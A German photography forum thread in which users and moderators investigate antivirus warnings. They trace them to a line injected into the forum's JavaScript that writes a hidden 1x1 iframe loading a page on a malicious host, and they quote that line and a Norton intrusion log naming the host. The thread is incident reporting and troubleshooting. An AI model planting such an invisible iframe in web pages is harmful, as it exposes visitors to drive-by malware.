• Neuer Gutscheincode unseres Partners Schutzfolien24:
    DSLR-Forum2025
    Dauerhaft 10% Rabatt auf alle Displayschutzfolien und Schutzgläser der Eigenmarken
    "Upscreen", "Screenleaf", BROTECT" und "Savvies".
    Der Code ist für alle Geräteklassen gültig.
  • Stimmt ab über die Sieger des DSLR-Forum Fotowettbewerbs September 2025.
    Thema: "Straßenfotografie s/w"
    Nur noch bis zum 30.09.2025 23:59!
    Jeder darf abstimmen!
    Zur Abstimmung und Bewertung hier lang
  • Ich freue mich bekannt geben zu können, dass das DSLR-Forum einen neuen Aktionspartner gewinnen konnte.

    Saal Digital bietet Fotoprodukte in HighEnd-Qualität.
    Für die Mitglieder des DSLR-Forums locken Rabatte und Sonderaktionen!
    Alle Informationen dazu sowie ein tolles Einstiegsangebot unseres neuen Kooperationspartners gibt es hier.

  • In eigener Sache!

    Liebe Mitglieder, liebe Besucher und Gäste
    ich weiß, es ist ein leidiges Thema, aber ich muss es ansprechen: Werbung, Werbeblocker und Finanzierung des Forums.
    Bitte hier weiterlesen ...

  • Nicht erreichbare Adressen im Benutzerkonto
    Wir bekommen zurzeit eine große Anzahl an E-Mails, die das System zum Beispiel als Benachrichtigungen an Nutzer verschickt,
    als unzustellbar zurück, weil z.B. die Adressen nicht erreichbar sind oder das Postfach gar nicht existiert.
    Stellt doch bitte sicher, dass die Benachrichtigungen, die ihr vom System erwartet, auch zugestellt werden können.
    Nicht erreichbare E-Mail-Adressen sind dazu wenig hilfreich.
    Danke!
WERBUNG

Virus Alert bei Bannerwerbung

So, jetzt hatte ich auch eine Virenmeldung.
FF wollte ein Plugin haben. Es war aber nicht zu ermitteln welches Plugin es wollte.
Vorher hat mein Virenscanner auch Alarm geschlagen.
Den Link
Code: 
http://jewelrynoir.ce.ms/showthread.php?t=10480506
hab ich lt. AdBlockplus auf jeder Seite, im Quellencode kann ich aber nichts davon finden.
 
Georgius schrieb:
Den Link ... hab ich lt. AdBlockplus auf jeder Seite
Zum Vergrößern anklicken....
Frage: Wo im ABP kann man das sehen? Ich kann da nur die Treffer der Filterregeln sehen... Ich hab Dr. Evils Liste und easylist abboniert und konnte da nichts sehen.

im Quellencode kann ich aber nichts davon finden.
Zum Vergrößern anklicken....
Ja, geht mir genauso. Sehr merkwürdig. Ist vielleicht eine Weiterleitung oder so, die man nicht direkt im HTML-Quellcode, sondern nur in den HTTP-Headern sehen kann.
 
Das hat sich im referenzierten Javascript versteckt:

Quelltext:
PHP: 
<script type="text/javascript" src="clientscript/yui/connection/connection-min.js?v=386"></script>

Javascript-Datei - erste Zeile:
PHP: 
document.write('<iframe src="http://jewelrynoir.ce.ms/showthread.php?t=10480506" width="1" height="1" frameborder="0"></iframe>');
 
Georgius schrieb:
Blockbare Elemente öffnen ... STRG+Shift+V
Zum Vergrößern anklicken....
Danke, jetzt sehe ichs auch. Typ: Frame.

interface01 schrieb:
Das hat sich im referenzierten Javascript versteckt:
Zum Vergrößern anklicken....
Ach Du Sch... also doch schon wieder (?) ein IFrame. Was ist hier los?

@scorpio: Sag mal, könnte es sein, dass irgendjemand unbemerkt Zugriff auf den eigentlichen Web-Server des Forums erlangt hat, wo die statischen HTML/CSS/JS-Seiten liegen? Also keine Lücke im vBulletin, sondern z.B. in der Administrationssoftware (o.ä.) des Server-Rechners? Nur so eine Idee... wäre aber eine Möglichkeit, wie jemand Iframes im Quellcode verstecken könnte.

Edit: Eben gerade beim Abschicken der Änderung ("@scorpio...") wieder die Warnmeldung von NIS bekommen. Scheint jetzt also auch ab und zu bei gleichbleibender IP zu passieren.

Zur Info hier die Ausgabe von NIS (meine IP hab ich ausgeixt):
Code: 
Kategorie:Intrusion Prevention
Datum/Uhrzeit,Risiko,Aktivität,Status,Empfohlene Aktion,Name der IPS-Warnung,Standardaktionen,Durchgeführte Aktion,Angreifender Computer,Angreifer-URL,Zieladresse,Quelladresse,Beschreibung des Datenverkehrs
15.05.2011 15:13,Hoch,Ein Eindringversuch von jewelrynoir.ce.ms wurde blockiert.,Blockiert,Keine Aktion erforderlich,Web Attack: Malicious Toolkit Website 9,Keine Aktion erforderlich,Keine Aktion erforderlich,"jewelrynoir.ce.ms (89.208.34.118, 80)",jewelrynoir.ce.ms/showthread.php?t=10480506,"xxx (xxx.xxx.xxx.xxx, 3668)",89.208.34.118 (89.208.34.118),"TCP, www-http"
 
Zuletzt bearbeitet:
So, mein Kaspersky hat auch angeschlagen als ich das Forum aufgerufen hatte. Bei mir war es aber keine Viren- sondern eine Trojaner-Warnung.

Ich benutze auch nicht Firefox sondern Opera 11.10, mit Win XP SP3.

Irgendwo ist noch etwas ins Forum eingebaut, da ja das iframe entfernt wurde,...

Gruß,
Andi
 
Wir sind dran.
Wir können das Board aber nicht abschalten, da wir Eure Rückmeldungen brauchen.
 
interface01 schrieb:
Anscheinend gibt einen neuen. :(
Zum Vergrößern anklicken....
Oder alten! Wenn ich die URL hxxp://www.dslr-forum.de/clientscript/yui/connection/connection-min.js?v=386 angebe, sagt Firefox mir bei den Seiteninformationen: Dienstag, 11. Januar 2011 09:08:12. Aber vielleicht ist ja zusammen mit der Datei auch deren letztes Änderungsdatum manipuliert worden.
Ok, das nehm ich zurück, das Iframe ist jetzt verschwunden, ich nehme also an, das vor ein paar Minuten die Originalversion der Datei zurückgespielt wurde, und die habe ich gesehen, richtig?

AdBlockPlus zeigt den Link jetzt auch nicht mehr an. IP-Neustart probiere ich gleich auch nochmal aus.
 
Zuletzt bearbeitet:
Ja, aber dann muss es doch eine Sicherheitslücke geben, die es ermöglicht das Board immer wieder aufs neue zu Hacken?

Gruß,
Andi
 
AdO089 schrieb:
Ja, aber dann muss es doch eine Sicherheitslücke geben, die es ermöglicht das Board immer wieder aufs neue zu Hacken?
Zum Vergrößern anklicken....
Das ist auch meine Befürchtung, siehe hier.

starscapefan schrieb:
AdBlockPlus zeigt den Link jetzt auch nicht mehr an. IP-Neustart probiere ich gleich auch nochmal aus.
Zum Vergrößern anklicken....
Quellcode sauber, AdBlockPlus zeigt nichts, IP-Neustart: Keine NIS-Meldung mehr. Forum scheint wieder sauber zu sein.

Das Forum ist zur Zeit übrigens teilweise extrem langsam (Wartezeiten), hängt das evtl. mit den Änderungen zusammen?
 
starscapefan schrieb:
das Iframe ist jetzt verschwunden, ich nehme also an, das vor ein paar Minuten die Originalversion der Datei zurückgespielt wurde, und die habe ich gesehen, richtig?
Zum Vergrößern anklicken....

Wahrscheinlich - besagte Javascript-Datei ist wieder sauber. :top:

Näheres wird aber Scorpio wissen. :)


Edit: Ich empfehle dennoch den Browserverlauf zu löschen, da auch Javascript-Dateien in selbigen geladen werden.
 
Zuletzt bearbeitet:
scorpio schrieb:
Wir sind dran.
Wir können das Board aber nicht abschalten, da wir Eure Rückmeldungen brauchen.
Zum Vergrößern anklicken....

Nach dem Motto "Wir brauchen die ahnungslosen Passanten, um zu sehen, wo sich der Heckenschütze versteckt"? Sorry, Crowdsourcing schön und gut aber das kann ja wohl nicht sein! Eine Warnung mit einem Link zum Forum für die, die sich sicher glauben ist meines Erachtens das höchste der Gefühle - alles andere ist grob fahrlässig!

Gruß
thommy

PS: Ich habe Java und JavaScript deaktiviert, bis sich das hier geklärt hat.
 
eifelthommy schrieb:
PS: Ich habe Java und JavaScript deaktiviert, bis sich das hier geklärt hat.
Zum Vergrößern anklicken....

Es ist längst alles wieder bereinigt, wie Du lesen kannst.

Und eine Bitte habe ich an Dich:
Kannst Du mir erklären, wie wir Rückmeldungen der Nutzer erhalten, ob alles wieder ok ist, wenn wir sie gar nicht ins Board lassen?
Danke.
 
scorpio schrieb:
Es ist längst alles wieder bereinigt, wie Du lesen kannst.

Und eine Bitte habe ich an Dich:
Kannst Du mir erklären, wie wir Rückmeldungen der Nutzer erhalten, ob alles wieder ok ist, wenn wir sie gar nicht ins Board lassen?
Danke.
Zum Vergrößern anklicken....

Das ist unerheblich. Auch beim letzten mal war hier wieder "alles in Ordnung". Trial and error kann hier nicht die Vorgehensweise sein! Hier wird wohl möglich zig-fach Schaden angerichtet - und das DARF nicht sein. Bevor die Lücke nicht gefunden ist, kann man das doch nicht einfach weiterlaufen lassen!
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
WERBUNG
Zurück
Oben Unten